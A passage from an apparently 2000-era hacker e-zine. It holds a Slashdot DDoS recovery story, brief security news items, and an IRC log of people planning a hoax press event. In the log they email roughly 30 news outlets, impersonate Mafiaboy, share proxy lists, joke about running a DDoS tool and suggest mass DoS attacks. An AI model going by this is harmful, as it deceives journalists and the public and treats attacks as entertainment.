stories posted on both Thursday and Friday, and it took us a awhile to
determine that the problems were external, and not a flaw in some new
component in the cluster."
The Attacks began Thursday morning. Most of it came in the form of SYN
floods, from obvious /16's no less, and some /24's. We didn't have any
zombie-killing software or a firewall installed because of certain network
topology issues. Later on, a second wave came, this closer to 8 or 9pm and
the load balancer (an arrowpoint CS-100) died under the load.
The DDoS, as far as I could see, was a lot of SYN and Zero port packets
coming from various /16's and /24's as well as a bunch of RFC1918 reserved
addresses (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16) At one point we
reached 109Mbits worth of traffic into our network.
Liz and I went back to Exodus and rebooted the Arrowpoint, then the site
seemed "ok" for a bit. By 3 in the morning, Liz decided that the PIX
(Cisco's firewall) could simply not do what it was supposed to do, so we
went back and started building a FreeBSD box as a bridging firewall.
just before we went to plug it in, I tried to ssh into the vpn-gate and
noticed that nothing was working right: while the site worked, outgoing
traffic and source groups on the Arrowpoint was screwed. As if that wasn't
enough, two ports died on it already!
At some unknown point (time blurs after 30 hours straight!) Martin and
PatG show up (thank the gods!) and they force us to go to sleep, they
bring the site up outside the Arrowpoint, while Liz and I watch from a
hotel room.
As of Friday morning, the site is semi-working, but the adsystem can't be
updated, and we have no access to the backend servers. I scream bloody
murder to Arrowpoint, who eventually shows up to blame the router: a cisco
6509 switch with two RSM/MSFCs.
Liz and I do packet dumps and determine it's not the router, the little
CS-100 had died the night before, and thats where it all started. The
Arrowpoint guy insists we did something to make the Arrowpoint not work
(CT: Explicit description of precisely where Liz and and Pat wanted to
store the newly deceased Arrowpoint removed to keep things rated PG) By 7
the CS-800 CSS is up we're almost done for the day, but we stay to make
sure. By 10pm we're exhausted but stable, although we're running 4 servers
on a round-robin DNS while the new load balancer waits.
Netops (Liz , Martin and I) regroup, and do reintegration of new
Arrowpoint CS-800 and installation of a new FreeBSD Firewall box instead
of the PIX during Saturday Afternoon. Slashdot returns to normal.
Sysadmins get well-deserved sleep.
So that was the story. It was a pretty hellish weekend for everyone
involved, but thanks again to those that helped get our ducks back in a
row. Again, Part #2 to this (which originally was gonna be run last
Thursday, but with all this ddos stuff got pushed aside) is a fairly
detailed description of the new Slashdot setup at Exodus, complete with
all the changes mentioned above. Fun for the whole family if your family
is really into clusters of web servers."
@HWA
218.0 [IND] China Executes Bank Manager for Computer Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 31, 2000
China Executes Bank Manager for Computer Crime
Human rights were thrown out of the window when China executed a bank
manager for embezzeling more that 2 million yuan by manipulating computer
records. According to China's state run media, Shen and an accomplice were
falsifying records and diverting funds into a personal account.
The accomplice still remains at large. Full story here. <lost link>
@HWA
219.0 [IND] Data Transmission Pioneer Passes Away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 31, 2000
Data Transmission Pioneer Passes Away
Donald W. Davies whose work included leading the team that built one of the first functioning
networks using packet data, has passed away at age 75. Credited with coining the term "packet
switching", Davies was one of the first people to realize that data needed to be broken into
discrete packets and not transmitted as whole files. Davies later began his focus on computer
security, conducting studies for teleprocessing systems, financial institutions, and government
agencies. His books included "Communication Networks for Computers" in 1973, "Computer
Networks and their Protocols" in 1979, and "Security for Computer Networks" in 1984. Full story
here. <lost link>
@HWA
220.0 [IND] Canada Agrees to Drop Big Brother Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 30, 2000
Canada Agrees to Drop Big Brother Files
In response to public outcry, the Canadian government has agreed to dismantle a large
database that held as many as 2000 pieces of information on each of it's citizens. Human
Resources Minister, Jane Stewart publicy stated that, "Given public concerns about privacy issues
in this era of advanced and constantly changing technology, I have chosen an approach that
addresses future threats to privacy." Full story here. <lost link>
@HWA
221.0 [IND] Senate Bill Will Make Minor Computer Hacking a Felony
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 25, 2000
Senate Bill Will Make Minor Computer Hacking a Felony
Penned the "Internet Integrity and Critical Infrastructure Protection Act," bill number S. 2448 will
make minor computer offenses felonies opening the door for the FBI and Secret Service to
investigate. Other bills that the Senate is attempting to sneak by include the further expansion
of wiretapping authority, which includes allowing the federal government to seize the house
where the offending computer is residing, and making all computer crimes a predicate for
wiretaps. Full story here. <lost link>
The United States government is clearly being swept up in the mayhem caused by the ILOVEYOU
virus. These bills are repressive and infringe on the rights of all United States citizens. If you find
any of this the least bit disturbing, please contact your local Congressman and Senator.
@HWA
222.0 [IND] McAfee considers Netbus pro legitimate tool
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacking tool slips through McAfee's net
McAfee's VirusScan software will no longer detect intrusion
by a Trojan Horse-based remote administration tool used by
hackers because it considers the product legitimate.
NetBus Pro is a commercial tool made by UltraAccess
Networks that allows machines to be monitored and files to
be accessed. But the product is based on the infamous
Trojan Horse called NetBus and has been used illegally by
hackers to gain access to systems.
McAfee used to report when it detected NetBus Pro in a
network, but last week Network Associates, which publishes
VirusScan, decided that it would no longer report incidences
of NetBus Pro intrusions.
Jack Clark, European product manager for Network
Associates, said: "McAfee will pick up the NetBus Trojan, but
the Pro product is a genuine remote access tool."
He said there is no point alerting network managers
whenever the tool is used legitimately, adding that the
weekly update of the drivers for VirusScan would include a fix
to halt some illegal uses of NetBus Pro.
"There is a way to hide the code on a user machine," said
Clark. "The update will detect if someone attempts to hide
their use of NetBus Pro in another file."
One of the original authors of the network intrusion tool Back
Orifice, who is now a consultant for security adviser @Stake,
said the hacker community has welcomed the news.
He added that these kinds of decisions were often influenced
by legal concerns that rival remote access tools might be
scanned out as viruses involving companies in antitrust
battles.
Judd Spence, chief executive of UltraAccess, said there were
many similar software programs that were not scanned by
antivirus software.
First published in Network News
� If you would like to comment on this article email us @
newseditor@vnunet.com
@HWA
223.0 [HWA] The Hoax
~~~~~~~~~~~~~~
I debated on wether or not to post this info/log since it has little real news merit
but does have some potential social-disobedience overtones to it and is subversive in
nature, after discussing it with several people and a reporter who shall remain
unnamed it was decided it had merit in its own righ so here it is to peruse and take
as you will - Ed
One night in the underground...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Two hackers were bored one night and decided to perpetrate a hoax
here is an overview of what transpired (Edited)
I was almost pulled into the event as it unfolded, my involvement
was minimal as i deal with real news not fake news however since
I am known some people went ahead and assumed I gave the plans my
blessings and included my site/zine without my consent, I asked
for it to be removed from the original "press release" and it was.
http://www.news.insource.nl/
Mafiaboy houdt chat
19 May 2000
De Canadese Mafiaboy, die schuldig pleitte voor het plegen van DoS aanvallen op diverse
grote sites, houd een chat waarbij iedereen hem vragen kan stellen. De chat vindt op 20
mei om 21 uur EST plaats op EfNet in het kanaal #media-event. Daar zal hij alle vragen
beantwoorden over wat er met hem is gebeurd en wat er gaat gebeuren.
Bron: Frank van Vliet
RAW INFO:
How it started:
[15:00] *** SliPY is now known as Mafiaboy
[15:00] <Mafiaboy> ./tfn world
[15:01] <Cruciphux> ppl aren't drunk enough to laugh at that yet
[15:02] <MrEreet> :)
[15:02] <Mafiaboy> give me a few hrs
[15:02] <Mafiaboy> tilli get drunk
[15:02] <MrEreet> hehe
[15:02] <Mafiaboy> and really make an ass of myself
[15:02] <MrEreet> ok
[15:02] * MrEreet gets ready to sell tickets and starts work on the promotional website ...
[15:03] <MrEreet> wanna have some fun?
[15:03] <MrEreet> should set up a fake news conference and get media online
[15:03] <Mafiaboy> well
[15:03] <Mafiaboy> the police
[15:03] <MrEreet> engage net media hype hoax #1
[15:03] <Mafiaboy> are doing a news conference
[15:03] <Mafiaboy> about me soon
[15:03] <MrEreet> another one?
[15:03] <Mafiaboy> it will be on cnn/cbc/global/atv (local/national news)
[15:04] <Mafiaboy> the rcmp ;/
[15:04] <MrEreet> "and there was much rejoicing"
[15:04] <Mafiaboy> heh
[15:04] <Mafiaboy> i hate the media
[15:04] <Mafiaboy> they blow shit out of proportion and stuff
[15:04] <Mafiaboy> like calling mafiaboy
[15:04] <Mafiaboy> a hacker
[15:05] * tekneeq is away: (.) [BX-MsgLog Off]
[15:05] *** logistix (x25@mumma-said-knock-you-out.*.uk) has joined #darknet
[15:05] <choppah4> bleh....
[15:05] <Cruciphux> sveditorial@sjmercury.com - SILICON VALLEY.COM
[15:05] <Cruciphux> tips@news.com - C|Net News tips
[15:05] <Cruciphux> paulf@cnet.com - columnist for C|Net NEWS.COM
[15:05] <Cruciphux> patrick_houston@zdnet.com - <patrick_houston@zdnet.com>
[15:05] <Cruciphux> Bob.Sullivan@msnbc.com - M$NBC
[15:05] <Cruciphux> adam.wolf@reuters.com - REUTERS Newswire
[15:05] <Cruciphux> nancy.bobrowitz@reuters.com
[15:05] <Cruciphux> news@pulse24.com - CityTV Toronto
[15:05] <Cruciphux> comments@foxnews.com - FOX news TV
[15:05] <Cruciphux> tips@wired.com - Wired media
[15:05] <Cruciphux> tips@news.com - NEWS.com
[15:05] <Cruciphux> mo@cmp.com -
[15:05] <Cruciphux> start mailing
[15:05] <MrEreet> heh
[15:06] <MrEreet> mass invite people to #media-event
[15:06] <Cruciphux> lol
[15:07] <choppah4> hehe "#leechasf eats a big fat hairy dick.../join #media-event"...
[15:07] <MrEreet> TONIGHT MAFIABOY'S UNDERGROUND CYBERGANG THREATENS ATTACKS'
[15:07] <MrEreet> some would come
[15:07] <MrEreet> dumbasses
[15:07] *** gw4hn sets mode: +o logistix
[15:07] <Mafiaboy> heheh
[15:07] <Cruciphux> fuck jennycam made the news
[15:08] <choppah4> hehe...
[15:08] <Mafiaboy> anyone wanna pull a fake media event?
[15:08] <Cruciphux> and how many times did we take that over
[15:08] <choppah4> yeah, but honestly...its jennycam...hehe...
[15:08] <Mafiaboy> i'll pose as mafiaboy
:
Session Start: Fri May 19 15:08:53 2000
Session Ident: Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net)
[15:08] <Mafiaboy> no seriously
[15:08] <Mafiaboy> u wanna do somethin like this?
[15:09] <Mafiaboy> say mafiaboy speaks out etc
[15:09] <MrEreet> fuck i'm bored enough
[15:09] <MrEreet> haha
[15:09] <Mafiaboy> same
[15:09] <Mafiaboy> and i got no life
[15:09] <Mafiaboy> heh
[15:09] <MrEreet> hehe
Session Close: Fri May 19 15:11:22 2000
:
[15:08] <MrEreet> :)
[15:08] <MrEreet> http://www.lightspeed.de/irc4all/
[15:08] <MrEreet> grab yer proxies
[15:08] <MrEreet> heh
[15:08] <Mafiaboy> proxy? heh i'm on a eleet shell
[15:08] <MrEreet> http://www.cyberarmy.com/lists/proxy/
[15:09] <MrEreet> http://proxylist.virtualave.net/
[15:09] <MrEreet> http://proxylist.hypermart.net/list.htm
[15:09] <Mafiaboy> well
[15:09] <Mafiaboy> i'm gonna bot mafiaboy
[15:09] <MrEreet> there thats like 7k worth some might work
[15:09] <Mafiaboy> for a while i think
[15:09] <Mafiaboy> hope they don't packet me too bad
[15:10] * [crow] is idle, auto-away after 10 mins. (l:On/p:On)
[15:10] *** SugarKing (sugaking@*.net) has joined #darknet
[15:11] * [crow] is back from the grave (53s)
[15:13] *** |eXiSt| has quit IRC (|eXiSt| has no reason)
[15:14] *** MrEreet is now known as Mitnick-
[15:15] *** Mitnick- is now known as Optik-
[15:21] * [crow] is idle, auto-away after 10 mins. (l:On/p:On)
[15:21] * [crow] is back from the grave ()
[15:21] * [crow] is idle, dinner (l:On/p:On)
[15:21] * tekneeq is back from the dead. .
[15:24] *** Optik- is now known as MrEreet
[15:24] <Cruciphux> **** That beta Ircd code is EXPLOITABLE *****
[15:25] <Cruciphux> info to come later
[15:25] <Cruciphux> (that isn't a joke)
[15:25] <tekneeq> cruc
[15:25] <tekneeq> op me
[15:26] *** Cruciphux sets mode: +o tekneeq
[15:26] <Tutor> hrm..
[15:26] <MrEreet> #media-event massive hoax in planning invite yer buddies we're gonna give CNN something entertaining
[15:26] <Tutor> tekneeq: bandwidth came back up...but gotr00t is hrm...fucked up
[15:26] <MrEreet> pass it on but don't give the game away
[15:27] <tekneeq> Tutor: ack
[15:27] *** tekneeq sets mode: +o Tutor
[15:27] <Tutor> yeah i think they locked a MAC into the IP (idiots...)
[15:27] <Tutor> but ultrapimpz is up....no DNS tho heh
[15:27] <Tutor> .114 and .112 both down...whores..
[15:28] *** SpYrOOt (~anomaizer@*.s3curity.com) has joined #darknet
[15:28] *** logistix is now known as aSsBaNdiT
[15:28] *** mountd has quit IRC (Ping timeout)
[15:31] *** klatch- (i0@*.cybercity.no) has joined #darknet
[15:31] *** i0 has quit IRC (Ping timeout: 180 seconds)
[15:31] *** klatch- is now known as i0
[15:31] *** LOB_Niall has quit IRC (xchat exiting..)
[15:38] *** CodeZero (~code@*.com) has joined #Darknet
[15:38] *** ojz (cazper@*.langame.net) has joined #darknet
[15:40] *** snake- (snake@*.uno.edu) has joined #darknet
[15:42] *** kgb-kid sets mode: +o CodeZero
[15:42] <aSsBaNdiT> cz0
[15:42] <aSsBaNdiT> wtf
[15:43] <CodeZero> hum?
[15:44] <kgb-kid> <gov-boi> hum what? ;))
[15:45] <CodeZero> hi gov
[15:49] *** psy_eye (psy_eye@*.yu) has joined #darknet
[15:50] <MrEreet> #media-event pass it on
[15:51] *** psy_eye has quit IRC (SendQ exceeded)
[15:52] *** Mafiaboy is now known as SLiPY
[15:54] *** CodeZero has quit IRC (Ping timeout: no data for 248 seconds)
[15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98)
[15:57] *** CodeZero (~code@*.com) has joined #darknet
[15:59] *** Shylock_ (juice@*.edu) has joined #darknet
[16:00] *** typo_ (typo@inferno.*.edu) has joined #darknet
[16:01] *** oxigen (oxigen@*.at) has joined #darknet
[16:01] <typo_> hi oxigen
[16:01] <typo_> alle leet ?
[16:02] <oxigen> �berleet ;)
[16:02] <tekneeq> uber alle
[16:02] <tekneeq> uber alles
[16:03] *** m1x (m1x@*.org) has joined #darknet
[16:03] <tekneeq> cd /tmp
[16:03] <typo_> haha
[16:03] <tekneeq> cd: command not found
[16:03] <tekneeq> SWEET
[16:03] <typo_> m1x: all of us joining now ;)
[16:03] <m1x> Hi
[16:08] *** Disconnected
-=-
Meanwhile behind the scenes in the 'control-booth' ...
Session Start: Fri May 19 15:41:40 2000
[15:41] *** Now talking in #media-admin
[�] Channel [ #media-admin ] Modes [ + ]
[15:41] *** MrEreet sets mode: +snt+k pimped
[15:42] *** Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net) has joined #media-admin
[15:42] *** MrEreet sets mode: +o Mafiaboy
[15:42] *** MrEreet changes topic to 'Hack of the millennium secret planning council'
[15:42] <MrEreet> :)
[15:43] *** i0 (i0@*.cybercity.no) has joined #media-admin
[15:43] <i0> Idle :P
[15:43] *** k-rad-bob (mobys_dick@*.cybercity.no) has joined #media-admin
[15:43] <MrEreet> {} is ok
[15:43] <MrEreet> he hacked apache.org
[15:43] <MrEreet> leave the ops just get ppl talking here
[15:44] <i0> lol
[15:44] <i0> wut if fbi trace you down
[15:44] <i0> hehe
[15:44] <MrEreet> i'll be using a proxy
[15:44] <i0> I will be here
[15:44] <i0> wouldnt want to miss it
[15:45] *** flatline` (lick@*.euronet.nl) has joined #media-admin
[15:45] *** twilight- (vvarder@*.com) has joined #media-admin
[15:45] <i0> we could start mass dosing and shit to make it big
[15:45] <i0> ;)
[15:45] <k-rad-bob> can i get a short summary of the "plans"?
[15:45] <k-rad-bob> i joined in pretty plate :/
[15:45] <flatline`> Mafiaboy, you want me to contact dutch magazines or not?
[15:45] <MrEreet> the idea of mass defacements crossed my mind but It wasn't my idea
[15:45] <MrEreet> :-)
[15:45] *** Amoeba (webmaster@*.net) has joined #media-admin
[15:45] <flatline`> heh
[15:45] <MrEreet> flatline` yeh
[15:46] <MrEreet> might want to use an alias so u don't blow your rep though
[15:46] <flatline`> i need the e-mail.
[15:46] *** SugarKing (sugaking@*.net) has joined #media-admin
[15:46] <flatline`> forward it to flatline@*.com plz
[15:46] <MrEreet> and start thinking
[15:46] <MrEreet> coz if someone contacts the real mafiaboy ...
[15:46] <i0> Anyone know wut 9pm est is in norwegian time
[15:46] <MrEreet> it should be vague
[15:47] <Amoeba> what kind of hoax is this?
[15:47] <MrEreet> http://www.timeanddate.com/time/abbreviations.html
[15:47] *** Mafiaboy sets mode: +ooo Amoeba flatline` i0
[15:47] *** Mafiaboy sets mode: +ooo k-rad-bob SugarKing twilight-
[15:47] *** Mafiaboy sets mode: -o i0
[15:48] *** Mafiaboy sets mode: -o Amoeba
[15:48] <i0> tanx
[15:48] *** Mafiaboy sets mode: +vv Amoeba i0
[15:48] <Amoeba> hey!
[15:48] <Amoeba> no ops?
[15:48] <MrEreet> maybe we give them too much time
[15:49] <Mafiaboy> oh well
[15:49] <SugarKing> hmm
[15:49] <Mafiaboy> tommorow gives them time to check email
[15:49] <SugarKing> think any media outlets are actually gonna show?
[15:49] <Mafiaboy> tommorow nite will be good
[15:50] <Amoeba> so, what's the plan here?
[15:50] <Mafiaboy> well
[15:50] <Mafiaboy> 30 media places have been contacted
[15:50] <Mafiaboy> they come in
[15:50] <Mafiaboy> ask questions
[15:50] <Mafiaboy> we give serious answers
[15:50] <Mafiaboy> it will be mad fun
[15:50] <Mafiaboy> make news and shit
[15:50] <Amoeba> about what?
[15:50] <Mafiaboy> and then we talk aboit
[15:50] <Mafiaboy> and then we talk about
[15:50] <Mafiaboy> our plan
[15:50] <Amoeba> what did you tell them?
[15:50] <Mafiaboy> to takeover the world
[15:50] <Mafiaboy> ;)
[15:50] <Mafiaboy> i sent a formal email
[15:50] <SugarKing> haha
[15:50] <Mafiaboy> not lame or anything
[15:50] <Amoeba> lol
[15:51] <MrEreet> fwd me the email MrEreet@dok.org
[15:51] <SugarKing> ya
[15:51] <SugarKing> it'll be real funny if it makes it
[15:51] <Amoeba> yeah, forward me what you sent them
[15:51] <MrEreet> might wanna make the topic a little more interesting
[15:51] <MrEreet> heh
[15:51] <SugarKing> heh
[15:51] <Mafiaboy> all the @'s will talk about after the questions directed to mafiaboy, me at the time most likely, and then we talk about our plans to take over the world by packetting and all serious fun shit
[15:51] <MrEreet> where'd Debris go
[15:51] <Mafiaboy> and that the rcmp won't keep us down
[15:51] <MrEreet> he's probably on the fone with mafiaboy
[15:51] <MrEreet> his sister dated him
[15:51] <MrEreet> heh
[15:51] <i0> espen@*.de forward there too
[15:52] *** Mafiaboy is now known as SLiPY
[15:52] <SugarKing> MrEreet: haha, really?
[15:52] <MrEreet> yeh
[15:52] <SugarKing> that's fucked
[15:52] <SLiPY> <SLiPY> gotta bot it
[15:52] <SLiPY> <SLiPY> put it on a better host
[15:52] <SLiPY> <SLiPY> till tommorow nite
[15:52] <SLiPY> <SLiPY> so when mafiaboy comes on
[15:52] <SLiPY> <SLiPY> he can use it
[15:52] <SLiPY> we gotta talk all fake and shit
[15:53] <Amoeba> is Mafiaboy in jail?
[15:53] <SLiPY> nah
[15:53] <SugarKing> not yet
[15:53] *** Debris (3223@*.montreal.*.net) has joined #media-admin
[15:53] <SLiPY> he wont be
[15:53] <MrEreet> lets call him
[15:53] <SugarKing> ya
[15:53] <Amoeba> why?
[15:53] <SugarKing> too young
[15:53] <Debris> call who
[15:53] <MrEreet> someone set up a conf
[15:53] *** SLiPY sets mode: +o Debris
[15:53] <Amoeba> oh
[15:54] <Amoeba> then Juvenile Detention?
[15:54] <MrEreet> mafiaboy
[15:54] <MrEreet> haha
[15:54] <SLiPY> no
[15:54] <SLiPY> he's at home
[15:54] <SugarKing> i dunno if they have that shit in Canada
[15:54] <Amoeba> well what's gonna happen to him?
[15:54] <SLiPY> Following the surprise plea the judge served the maximum sentence of 240 hours of community work plus one year's probation, restricted use of a computer, and ordered the defendant to deliver a speech at a local high school court on the evils of hacking.
[15:54] <SLiPY> thats why he is talkin to us.
[15:54] <Debris> mafiaboy lives 5minutes awayfrom me heh
[15:54] <Debris> slipy
[15:54] <Debris> thats j0n
[15:54] <Debris> not mafiaboy
[15:54] <MrEreet> Debris go get him
[15:54] <MrEreet> hehe
[15:54] <Debris> h3h
[15:54] <Debris> his parents dont let me in the house
[15:54] <Amoeba> so someone is going to pose as Mafiaboy?
[15:54] <Debris> my sisters in 3 of his classes
[15:54] <MrEreet> don't forget to mention as much as you can about the awesome HWA zine
[15:55] <MrEreet> j/k
[15:55] <Amoeba> how old is he?
[15:55] <MrEreet> rofl
[15:55] <Debris> fone
[15:55] <SugarKing> Debris: he still goes to school?
[15:55] <Amoeba> mention about my site
[15:55] <Amoeba> www.g-t-online.com
[15:55] <SugarKing> he must be, popular, hahahah
[15:55] <k-rad-bob> lol cru
[15:55] <SLiPY> debris
[15:55] <SLiPY> u sure?
[15:55] <MrEreet> haha shouldn't have said that
[15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98)
[15:55] <SLiPY> i thought it was mafiaboy
[15:55] <MrEreet> anyone spamming dalnet and undernet #hackphreak etc?
[15:56] <SugarKing> SLiPY: different people
[15:56] <SugarKing> one hacked MIT and NASA
[15:56] <MrEreet> i lost him
[15:56] <flatline`> SLiPY, did you forward that e-mail?
[15:57] <k-rad-bob> cruci: are you going to be featuring this in next hwa issue?
[15:57] <SugarKing> he has too
[15:57] <SLiPY> flat, whats the email?
[15:57] <SugarKing> he'd be dumb not to:)
[15:57] <Amoeba> How We Fooled the Media
[15:57] <MrEreet> k-rad-bob lol
[15:58] <flatline`> SLiPY: flatline@*.com
[15:58] <SugarKing> I would consider it twice though
[15:58] <SugarKing> you wouldn't be trusted with wired or anyone else
[15:58] <MrEreet> I admit i had no news or ideas so when that happens you do what 2600 does and manufacture irc logs to make news
[15:58] <SugarKing> most likely
[15:58] <MrEreet> oh someone tell #2600 but don't mention hoax those tight asses will expose it
[15:59] <Amoeba> lol
[15:59] <SugarKing> 2600 is gay
[15:59] <MrEreet> emmanuel is okIyAnsDV@2600.COM * Emmanuel Goldstein
[15:59] <MrEreet> emmanuel using irc.concentric.net Concentric Network Corporation
[15:59] <MrEreet> emmanuel has been idle 9hrs 11mins 39secs, signed on Thu May 18 03:45:18
[15:59] <SugarKing> hmm
[15:59] <Amoeba> they breaks sticks with their but cheeks?
[15:59] <MrEreet> he gets media tho
[15:59] <SLiPY> dude
[15:59] <SugarKing> i doubt he'll buy it though
[15:59] <SLiPY> if u want the email letter i sent out
[15:59] <SLiPY> say yer email
[15:59] <SLiPY> i'll reply
[15:59] <SLiPY> and u guys forward it more to people
[15:59] <SLiPY> i did like 30 agencies now
[15:59] <Amoeba> I_am_the_real_gto@yahoo.com
[16:00] <Amoeba> Cruci, answer my msgs
[16:00] <MrEreet> k
[16:02] <MrEreet> might be fun if it doesn't fall apart
[16:02] *** SLiPY sets mode: -o Debris
[16:02] *** SLiPY sets mode: +o Debris
<snip>
[16:02] <MrEreet> don't lose ops
[16:02] <MrEreet> heh
[16:02] <twilight-> i did, it just got reset cuz the bot relinked to it
[16:02] <SLiPY> ok
[16:02] <SLiPY> debris
[16:02] <SLiPY> sorry bout that
[16:02] <SLiPY> bot trouble
[16:02] <Debris> i dont care heh
[16:03] <Debris> just only op bots
[16:03] <Amoeba> who is mafiaboy?
[16:03] <Debris> and keep the channel in lock down
[16:03] <MrEreet> hehe
[16:03] <MrEreet> its a secret
[16:03] <Amoeba> who is he?
[16:03] <Amoeba> a bot?
[16:03] <twilight-> you want me to lock it?
[16:03] <MrEreet> Amoeba the real one?
[16:03] <Debris> an evil hacker
[16:03] <MrEreet> he DoS'd some big name websites off the net
[16:03] <MrEreet> yahoo and cnn
[16:03] <MrEreet> etc
[16:04] <MrEreet> don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel.
[16:05] <MrEreet> fed #1
[16:05] <MrEreet> [16:03] <Nikkitaal> btw: talking with me is like talking directly to goverment ;-)
[16:05] <MrEreet> [16:03] * Nikkitaal *waves* on cybercops watching him
[16:05] <MrEreet> already id'd as hoax
[16:05] <MrEreet> anyone know him
<snip>
[16:13] <SLiPY> heh
[16:13] <SLiPY> this is gonna be so much fun
[16:13] <SLiPY> and for fuck sakes
[16:13] <SLiPY> lets try to make this professional
[16:13] <Amoeba> how is it a hoax?
[16:13] <Amoeba> because mafiaboy won't really be here?
[16:13] <SLiPY> Bob,
[16:13] <SLiPY> Thanks for the note. I'm sure you understand my reservations. Is
[16:13] <SLiPY> there any way you can convince me this will be authentic?
[16:13] <SLiPY> Bob
[16:13] <SLiPY> hahaha
[16:13] <SLiPY> MSNBC
[16:13] <Amoeba> tell him that you are looking at him right now
[16:13] <Amoeba> no, nevermind
[16:13] <Amoeba> where would they be?
[16:14] <SLiPY> the feds?
[16:14] <SLiPY> bah
[16:14] <SLiPY> they can suck my dick
[16:14] <MrEreet> he is NASA security
[16:14] <SLiPY> i been raided already
[16:14] <MrEreet> <allegedly>
[16:15] <Amoeba> Slipy, they raided you?
[16:15] <SLiPY> yes
[16:15] <SLiPY> rcmp did
[16:15] <Amoeba> why?
[16:15] <Amoeba> who or what is rcmp?
[16:15] *** SugarKing sets mode: +oo MrEreet SLiPY
[16:15] <MrEreet> royal canadian mounted police
[16:15] <Amoeba> oh
[16:15] <Amoeba> I'm not in canada
[16:15] <SugarKing> heh
[16:15] <SugarKing> we can tell
[16:15] <SugarKing> alright
[16:15] <SugarKing> bbiab
[16:16] <Amoeba> how would the be, ey?
[16:16] <Amoeba> the=that
[16:16] *** flatline` has quit IRC (Ping timeout: 240 seconds)
[16:16] <SugarKing> haha
[16:16] *** SugarKing has quit IRC (Leaving)
[16:16] <Debris> whats hwa's url
[16:16] <Amoeba> www.g-t-online.com
[16:16] <SLiPY> man
[16:16] <SLiPY> they emailed me back
[16:16] <SLiPY> saying they will be here
[16:17] <MrEreet> http://welcome.to/HWA.hax0r.news
[16:17] <SLiPY> hehehehehehheejh
[16:17] <MrEreet> who?
[16:17] *** SLiPY is now known as YPiLS
[16:17] <MrEreet> can i have ops in chan plz
[16:17] *** MrEreet is now known as Optik-
[16:17] <YPiLS> MSNBC
[16:17] <Optik-> cool
[16:17] *** Optik- is now known as MrEreet
[16:18] <MrEreet> don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel.
[16:18] <YPiLS> we need to talk about
[16:18] <YPiLS> our future plans
[16:19] <YPiLS> and start a group
[16:19] <YPiLS> make it all up
[16:19] <YPiLS> but once we get a conf goin
[16:19] <YPiLS> we'll call mafia
[16:20] <Amoeba> what do you mean conference?
[16:20] <Amoeba> and I thought someone is going to act like amfia
[16:20] <Amoeba> mafia
[16:20] <YPiLS> oh we are
[16:20] <YPiLS> but we wanna talk to the real mafia
[16:20] <Amoeba> oh
[16:21] <Amoeba> I never talked to him
[16:21] <Amoeba> how old is he?
[16:21] <Amoeba> 15?
[16:21] <YPiLS> 15
[16:21] <YPiLS> heh
[16:21] <YPiLS> will be mad fun
[16:21] <Amoeba> me too
[16:21] <Amoeba> I like to think of myself as 16
[16:21] <YPiLS> we emailed
[16:21] <YPiLS> over 30 agencyes
[16:21] <YPiLS> msnbc has confirmed they will be here
[16:22] <YPiLS> opps
[16:22] <Amoeba> I never got a mail with your mail, so I can send it to more places
[16:22] <YPiLS> whats address
[16:22] <Amoeba> msnbc???
[16:22] <YPiLS> i think 1 email fucked up
[16:22] <YPiLS> and said it couldn't be sent
[16:22] <Amoeba> get cnbc
[16:22] <Amoeba> I_am_the_real_gto@yahoo.com
[16:22] <Amoeba> what about ZDTV and ZDNET
[16:23] <YPiLS> emailed
[16:23] <YPiLS> but not replied
[16:23] <Amoeba> ok
[16:23] <Amoeba> ?
[16:23] <Amoeba> oh
[16:23] <Debris> this press release is rulling
[16:23] <Amoeba> what about wired news?
[16:23] <Debris> dude
[16:23] <Debris> you dont neeed that many
[16:23] <Amoeba> I hate to see what you do when you are more bored
[16:23] <Debris> all the online ones pick it up off of the wire
[16:23] <YPiLS> wired = emailed
[16:23] <YPiLS> zdnn replyed saying they got the tip
[16:24] <Amoeba> lol
[16:25] <Amoeba> so, can I have a part in this charade?
[16:25] <YPiLS> sure
[16:25] <YPiLS> we will introduce
[16:25] <YPiLS> the new group
[16:25] <YPiLS> heh
[16:25] <Amoeba> what kind of group?
[16:25] <YPiLS> and talk about our plans of chaos and deadly destruction
[16:25] <YPiLS> terrorisy
[16:25] <YPiLS> terrorist
[16:25] <Amoeba> brb
[16:25] <YPiLS> heh
[16:25] <YPiLS> we need to make this be good
[16:25] <Amoeba> gonna change my e-mail address so I don't get in trouble
[16:25] *** Amoeba has quit IRC (ircN 7.24 + 7.0 for mIRC (2000/03/17 22.00))
[16:25] <MrEreet> people bored yet?
[16:25] <MrEreet> heh
[16:26] <YPiLS> Thank you for sending your news tip to Wired News. We always welcome leads
[16:26] <YPiLS> that make our news informative and interesting. A reporter or editor may
[16:26] <YPiLS> follow up on this message with a request for more information.
[16:26] <YPiLS> fuck no
[16:26] <YPiLS> are u cruc?
[16:27] *** Amoeba (GTO@dialup-*.net) has joined #media-admin
[16:27] <k-rad-bob> what time is it right now in EST?
[16:27] <MrEreet> thinking
[16:27] <twilight-> Fri May 19 16:35:22 2000
[16:27] <MrEreet> might have blown it
[16:27] <Amoeba> back
[16:27] <twilight-> est
[16:27] <Amoeba> 4:37 est
[16:27] <Amoeba> Cruci, how?
[16:27] <YPiLS> this starts tommorow nite
[16:27] <YPiLS> 9pm EST
[16:28] <YPiLS> we haven't blown it, we just need to keep quite, either way its gonne be funny
